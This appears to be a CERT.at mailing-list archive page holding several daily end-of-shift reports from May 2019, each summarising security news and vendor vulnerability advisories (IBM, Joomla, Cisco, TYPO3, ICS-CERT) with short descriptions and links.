Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Application Dependency Discovery Manager (TADDM) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: IBM DataPower Gateway is affected by a message spoofing vulnerability (CVE-2019-6110) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-datapower-gateway… ∗∗∗ IBM Security Bulletin: A vulnerability in IBM Cloud App Management V2018 could allow an attacker to obtain sensitive configuration information ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-a-vulnerability-in-ib… ∗∗∗ IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Integrated Analytics System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vulnerability-in-open… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM SDK Java Technology Edition affect IBM Cloud App Management V2018.4.1 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: A vulnerability in Apache Tomcat could affect IBM Cloud App Management V2018 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-a-vulnerability-in-ap… ∗∗∗ IBM Security Bulletin: Financial Transaction Manager for Corporate Payment Services is affected by a potential cross-site request forgery vulnerability (CVE-2018-1790) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-financial-transaction… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.05.2019
by Daily end-of-shift report 08 May '19

08 May '19

===================== = End-of-Day report = ===================== Timeframe: Dienstag 07-05-2019 18:00 − Mittwoch 08-05-2019 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Hacker gesucht: "Auch Zehnjährige verstehen, was ein sicheres Passwort ist" ∗∗∗ --------------------------------------------- Ab sofort werden im Rahmen der Cyber Security Challenge wieder die besten Hacker Österreichs gesucht. --------------------------------------------- https://futurezone.at/digital-life/hacker-gesucht-auch-zehnjaehrige-versteh… ∗∗∗ Biometric Authentication Overview, Advantages & Disadvantages [Updated 2019] ∗∗∗ --------------------------------------------- What is biometric authentication? Biometric authentication is simply the process of verifying your identity using your measurements or other unique characteristics of your body, then logging you in a service, an app, a device and so on. What’s complicated is the technology behind it, so let’s see how it works. --------------------------------------------- https://heimdalsecurity.com/blog/biometric-authentication/ ∗∗∗ Researchers’ Evil Clippy cloaks malicious Office macros ∗∗∗ --------------------------------------------- A team of security researchers has exploited Microsoft’s patchy macro documentation to hide malicious code inside innocent-looking macros. --------------------------------------------- https://nakedsecurity.sophos.com/2019/05/08/researchers-cloak-malicious-off… ∗∗∗ Unternehmen aufgepasst: Bewerbungen mit Schadsoftware in Umlauf ∗∗∗ --------------------------------------------- Generisch gehaltene Mails mit dem Betreff „Bewerbung für Ihre Stellenausschreibung“ werden momentan von Kriminellen verbreitet. Die Nachrichten enthalten ein passwortgeschütztes und somit verschlüsseltes Word-Dokument. Das dazugehörige Passwort ist in der Mail zu finden. Empfänger/innen dürfen den Anhang nicht öffnen. Er enthält Schadsoftware! --------------------------------------------- https://www.watchlist-internet.at/news/unternehmen-aufgepasst-bewerbungen-m… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Elastic Services Controller REST API Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the REST API of Cisco Elastic Services Controller (ESC) could allow an unauthenticated, remote attacker to bypass authentication on the REST API.The vulnerability is due to improper validation of API requests. An attacker could exploit this vulnerability by sending a crafted request to the REST API. A successful exploit could allow the attacker to execute arbitrary actions through the REST API with administrative privileges on an affected system. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (dovecot, kernel, linux-zen, munin, nautilus, perl-email-address, and tcpreplay), Debian (atftp), Fedora (perl-YAML and teeworlds), Mageia (java-1.8.0-openjdk, ldb, libsolv, and putty/filezilla/wxgtk), openSUSE (freeradius-server, libjpeg-turbo, pacemaker, rubygem-actionpack-5_1, wpa_supplicant, and yubico-piv-tool), Red Hat (chromium-browser, container-tools:rhel8, edk2, firefox, flatpak, ghostscript, httpd:2.4, mod_auth_mellon, openwsman, [...] --------------------------------------------- https://lwn.net/Articles/787842/ ∗∗∗ [20190502] - Core - By-passing protection of Phar Stream Wrapper Interceptor ∗∗∗ --------------------------------------------- http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/vyaXtvewK3I/781-20190502-c… ∗∗∗ [20190501] - Core - XSS in com_users ACL debug views ∗∗∗ --------------------------------------------- http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/xio2qb8Db2U/780-20190501-c… ∗∗∗ TYPO3-PSA-2019-008: By-passing protection of Phar Stream Wrapper Interceptor ∗∗∗ --------------------------------------------- https://typo3.org/security/advisory/typo3-psa-2019-008/ ∗∗∗ TYPO3-PSA-2019-007: By-passing protection of Phar Stream Wrapper Interceptor ∗∗∗ --------------------------------------------- https://typo3.org/security/advisory/typo3-psa-2019-007/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational Directory Server (Tivoli) & Rational Directory Administrator ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Installation Manager and IBM Packaging Utility ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Session Management vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2019-4072) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-session-management-vu… ∗∗∗ IBM Security Bulletin: Potential CSV injection threat affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2019-4071) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-potential-csv-injecti… ∗∗∗ IBM Security Bulletin: IBM Security Guardium is affected by a Spring Framework vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-security-guardium… ∗∗∗ IBM Security Bulletin: Potential denial of service in WebSphere Application Server affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2018-10237) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-potential-denial-of-s… ∗∗∗ IBM Security Bulletin: IBM MQ Advanced Cloud Pak is vulnerable to a buffer overflow in the curl command (CVE-2018-16842) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-mq-advanced-cloud… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Host On-Demand ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Planning ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Security vulnerabilities have been identified in IBM Java Runtime and the microcode shipped with the DS8000 Hardware Management Console (HMC) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-security-vulnerabilit… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.05.2019
by Daily end-of-shift report 07 May '19

07 May '19

===================== = End-of-Day report = ===================== Timeframe: Montag 06-05-2019 18:00 − Dienstag 07-05-2019 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Confluence Servers Hacked to Install Miners and Rootkits ∗∗∗ --------------------------------------------- After getting pounded with ransomware and malware for deploying distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now compromised to mine for cryptocurrency. --------------------------------------------- https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to… ∗∗∗ "7 Tips For Planning ICS Plant Visits" ∗∗∗ --------------------------------------------- As you plan the next visit to your ICS plant(s) with your security team, consider these seven tips. They will maximize time on-site for accurate asset identification, effective cybersecurity awareness that will foster IT and OT relationships for smooth ICS incident response, and highlight new ways to ethically hack your digital and physical security perimeter. --------------------------------------------- http://ics.sans.org/blog/2019/05/06/7-tips-for-planning-ics-plant-visits ∗∗∗ Entschlüsselungstool für Erpressungstrojaner MegaLocker/NamPoHyu verfügbar ∗∗∗ --------------------------------------------- Sicherheitsforscher haben ein Gratis-Entschlüsselungstool für eine aktuelle Ransomware veröffentlicht. Der Malware-Entwickler findet das gar nicht witzig. --------------------------------------------- https://heise.de/-4415835 ∗∗∗ Turla LightNeuron: An email too far ∗∗∗ --------------------------------------------- ESET research uncovers Microsoft Exchange malware remotely controlled via steganographic PDF and JPG email attachments --------------------------------------------- https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/ ∗∗∗ WordPress GraphQL plugin exploit ∗∗∗ --------------------------------------------- Third-party plugins are often the security Achilles heel of Content Management Systems (CMS). It seems like not a month goes by without one security researcher or another uncovers a vulnerability in a plugin, undermining the security of the whole platform. --------------------------------------------- https://www.pentestpartners.com/security-blog/wordpress-graphql-plugin-expl… ∗∗∗ Surge of MegaCortex ransomware attacks detected ∗∗∗ --------------------------------------------- New MegaCortex ransomware strain detected targeting the enterprise sector. --------------------------------------------- https://www.zdnet.com/article/sudden-surge-of-megacortex-ransomware-infecti… ∗∗∗ WordPress finally gets the security features a third of the Internet deserves ∗∗∗ --------------------------------------------- WordPress 5.2 released with support for cryptographically-signed updates, a modern cryptographic library. --------------------------------------------- https://www.zdnet.com/article/wordpress-finally-gets-the-security-features-… ===================== = Vulnerabilities = ===================== ∗∗∗ [20190501] - Core - XSS in com_users ACL debug views ∗∗∗ --------------------------------------------- Project: Joomla! SubProject: CMS Impact: Moderate Severity: Low Versions: 1.7.0 through 3.9.5 Exploit type: XSS Reported Date: 2019-April-29 Fixed Date: 2019-May-07 CVE Number: CVE-2019-11809 Description The debug views of com_users do not properly escape user supplied data, which leads to a potential XSS attack vector. Affected Installs Joomla! CMS versions 1.7.0 through 3.9.5 Solution Upgrade to version 3.9.6 Contact The JSST at the Joomla! Security Centre. Reported By: Jose Antonio --------------------------------------------- http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/xio2qb8Db2U/780-20190501-c… ∗∗∗ Android Security Bulletin - May 2019 ∗∗∗ --------------------------------------------- [...] The most severe of these issues is a critical security vulnerability in Media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. --------------------------------------------- https://source.android.com/security/bulletin/2019-05-01.html ∗∗∗ USN-3969-1: wpa_supplicant and hostapd vulnerability ∗∗∗ --------------------------------------------- wpa vulnerabilityA security issue affects these releases of Ubuntu and its derivatives:Ubuntu 19.04Ubuntu 18.10Ubuntu 18.04 LTSUbuntu 16.04 LTSSummarywpa_supplicant and hostapd could be made to crash if they receivedspecially crafted network traffic. --------------------------------------------- https://usn.ubuntu.com/3969-1/ ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (389-ds-base, firefox-esr, and symfony), Fedora (poppler), SUSE (audit, ovmf, and webkit2gtk3), and Ubuntu (aria2, FFmpeg, gnome-shell, and sudo). --------------------------------------------- https://lwn.net/Articles/787732/ ∗∗∗ Security Bulletins for TYPO3 CMS ∗∗∗ --------------------------------------------- https://typo3.org/help/security-advisories/typo3-cms/ ∗∗∗ Security Bulletins for TYPO3 Extensions ∗∗∗ --------------------------------------------- https://typo3.org/help/security-advisories/typo3-extensions/ ∗∗∗ Public Services Announcements for TYPO3 ∗∗∗ --------------------------------------------- https://typo3.org/help/security-advisories/public-service-announcements/ ∗∗∗ IBM Security Bulletin: Multiple Java Vulnerabilities Impact IBM Control Center (CVE-2018-3180, CVE-2018-1890) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-java-vulnera… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.05.2019
by Daily end-of-shift report 06 May '19

06 May '19

===================== = End-of-Day report = ===================== Timeframe: Freitag 03-05-2019 18:00 − Montag 06-05-2019 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Cronjob Backdoors ∗∗∗ --------------------------------------------- Attackers commonly rely on backdoors to easily gain reentry and maintain control over a website. They also use PHP functions to further deepen the level of their backdoors. A good example of this is the shell_exec function which allows plain shell commands to be run directly through the web application, providing attackers with an increased level of control over the environment. --------------------------------------------- https://blog.sucuri.net/2019/05/cronjob-backdoors.html ∗∗∗ WLAN-Presenter-Systeme mit kritischen Sicherheitslücken ∗∗∗ --------------------------------------------- WLAN-Gateways, die in vielen Meeting-Räumen das kabellose Anzeigen von Folien ermöglichen, lassen sich kapern und mit Schadcode verseuchen. --------------------------------------------- https://heise.de/-4413258 ∗∗∗ Erpressungswelle zielt auf öffentliche Git-Repositorys ∗∗∗ --------------------------------------------- Seit einigen Tagen haben Erpresser zahlreiche Repositorys bei GitHub, GitLab und BitBucket gelöscht und fordern Bitcoins für die Wiederherstellung. --------------------------------------------- https://heise.de/-4413576 ∗∗∗ Betrügerische Job-Angebote verführen zur Geldwäsche ∗∗∗ --------------------------------------------- Auf der Suche nach dem neuen Job stoßen Konsument/innen häufig auf betrügerische Angebote, bei denen die Aufgabe aus der Weiterleitung von Geldbeträgen besteht. Nicht immer ist dies bereits in der entsprechenden Jobausschreibung erkennbar. So geschehen auch auf der von Kriminellen übernommenen Website bulldozer-sprachschule.at, wo Bewerber/innen zur Geldwäsche aufgefordert wurden. --------------------------------------------- https://www.watchlist-internet.at/news/betruegerische-job-angebote-verfuehr… ===================== = Vulnerabilities = ===================== ∗∗∗ High-Severity PrinterLogic Flaws Enable Remote Code Execution ∗∗∗ --------------------------------------------- The three flaws enable an unauthenticated attacker to launch remote code execution attacks on printers. --------------------------------------------- https://threatpost.com/printerlogic-remote-code-execution/144383/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (jquery, librecad, and phpbb3), Fedora (bubblewrap, java-11-openjdk, libvirt, openssh, and pacemaker), Mageia (virtualbox), openSUSE (chromium, ImageMagick, and java-11-openjdk), and SUSE (openssl-1_1). --------------------------------------------- https://lwn.net/Articles/787599/ ∗∗∗ HPESBHF03769 rev.2 - HPE Integrated Lights-out 4 (iLO 4), and Moonshot Multiple Remote Vulnerabilities ∗∗∗ --------------------------------------------- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n… ∗∗∗ IBM Security Bulletin: IBM TRIRIGA is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data (CVE-2019-4208) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-tririga-is-vulner… ∗∗∗ IBM Security Bulletin: IBM TRIRIGA Application Platform may disclose sensitive information (CVE-2019-4207) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-tririga-applicati… ∗∗∗ IBM Security Bulletin: Vulnerability in Pivotal Spring Framework affects IBM TRIRIGA Application Platform (CVE-2018-15786) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vulnerability-in-pivo… ∗∗∗ IBM Security Bulletin: IBM TRIRIGA Application Platform could disclose sensitive information (CVE-2018-2008) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-tririga-applicati… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Cloud App Management V2018 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: IBM Cúram Social Program Management contains a cross-site request forgery vulnerability in the REST API (CVE-2018-2001) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-curam-social-prog… ∗∗∗ IBM Security Bulletin: Java Vulnerability Affects IBM Sterling Connect:Direct Browser User Interface (CVE-2018-1890, CVE-2018-3180) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-java-vulnerability-af… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Directory Server ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® Runtime Environment Java™ Version affect IBM Cloud Manager with OpenStack ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Vulnerabilities in GNU OpenSSL (1.0.2 series) affect IBM Netezza Analytics ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vulnerabilities-in-gn… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 03.05.2019
by Daily end-of-shift report 03 May '19

03 May '19

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 02-05-2019 18:00 − Freitag 03-05-2019 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Decryptor for MegaLocker and NamPoHyu Virus Ransomware Released ∗∗∗ --------------------------------------------- Emsisoft has released a decryptor for the MegaLocker and NamPoHyu Virus ransomware that has been targeting exposed Samba servers. Victims can now use this decryptor to recover their files for free. [...] --------------------------------------------- https://www.bleepingcomputer.com/news/security/decryptor-for-megalocker-and… ∗∗∗ Informal Expert Group on EU Member States Incident Response Development ∗∗∗ --------------------------------------------- ENISA launches this Call for Participation to invite experts to participate in its expert group. --------------------------------------------- https://www.enisa.europa.eu/news/enisa-news/informal-e-xpert-group-on-eu-ms… ∗∗∗ 2019: The Return of Retefe ∗∗∗ --------------------------------------------- Retefe is a banking Trojan that historically has routed online banking traffic intended for targeted banks through a proxy instead of the web injects more typical of other bankers. [...] Although Retefe only appeared infrequently in 2018, the banker returned to more regular attacks on Swiss and German victims in April of 2019 with both a Windows and macOS version. Retefes return to the landscape was marked by several noteworthy changes: [...] --------------------------------------------- https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe ∗∗∗ Abus Funkalarmanlage: Sicherheitslücke erlaubt Klonen von RFID-Schlüsseln ∗∗∗ --------------------------------------------- Erst vergangene Woche enthüllten Sicherheitsforscher drei Sicherheitslücken in Abus Secvest Alarmanlagen. Nun folgt eine weitere. --------------------------------------------- https://heise.de/-4412282 ∗∗∗ D-Link schützt DNS-320 und weitere NAS mit Updates gegen Cr1ptTor-Ransomware ∗∗∗ --------------------------------------------- Die Netzwerkspeicher DNS-320L, DNS-325 und DNS-327L waren anfällig für Angriffe durch den Verschlüsselungstrojaner Cr1ptor. Firmware-Updates sollen das ändern. --------------------------------------------- https://heise.de/-4412656 ∗∗∗ Vulnerabilities Found in Over 100 Jenkins Plugins ∗∗∗ --------------------------------------------- A researcher has discovered vulnerabilities in more than 100 plugins designed for the Jenkins open source software development automation server and many of them have yet to be patched. read more --------------------------------------------- https://www.securityweek.com/vulnerabilities-found-over-100-jenkins-plugins ===================== = Vulnerabilities = ===================== ∗∗∗ Orpak SiteOmat ∗∗∗ --------------------------------------------- This advisory includes mitigations for use of hard-coded credentials, cross-site scripting, SQL injection, missing encryption of sensitive data, code injection, and stack-based buffer overflow vulnerabilities reported in Orpak’s SiteOmat, software for fuel station management. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-19-122-01 ∗∗∗ GE Communicator ∗∗∗ --------------------------------------------- This advisory includes mitigations for uncontrolled search path, use of hard-coded credentials, and improper access control vulnerabilities reported in GEs Communicator software. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-19-122-02 ∗∗∗ Sierra Wireless AirLink ALEOS ∗∗∗ --------------------------------------------- This advisory includes mitigations for OS command injection, use of hard-coded credentials, unrestricted upload of file with dangerous type, cross-site scripting, cross-site request forgery, information exposure, and missing encryption of sensitive data vulnerabilities reported in the Sierra Wireless AirLink ALEOS products. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-19-122-03 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (linux-4.9 and otrs2), Fedora (gradle, java-1.8.0-openjdk, jetty, kernel, ruby, and runc), openSUSE (dovecot23, jasper, libsoup, ntfs-3g_ntfsprogs, and webkit2gtk3), SUSE (openssl), and Ubuntu (python-gnupg). --------------------------------------------- https://lwn.net/Articles/787413/ ∗∗∗ IBM Security Bulletin: Vyatta 5600 vRouter Software Patches – Releases 1801-w and 1801-y ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vyatta-5600-vrouter-s… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affects IBM Storwize V7000 Unified ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily May 2019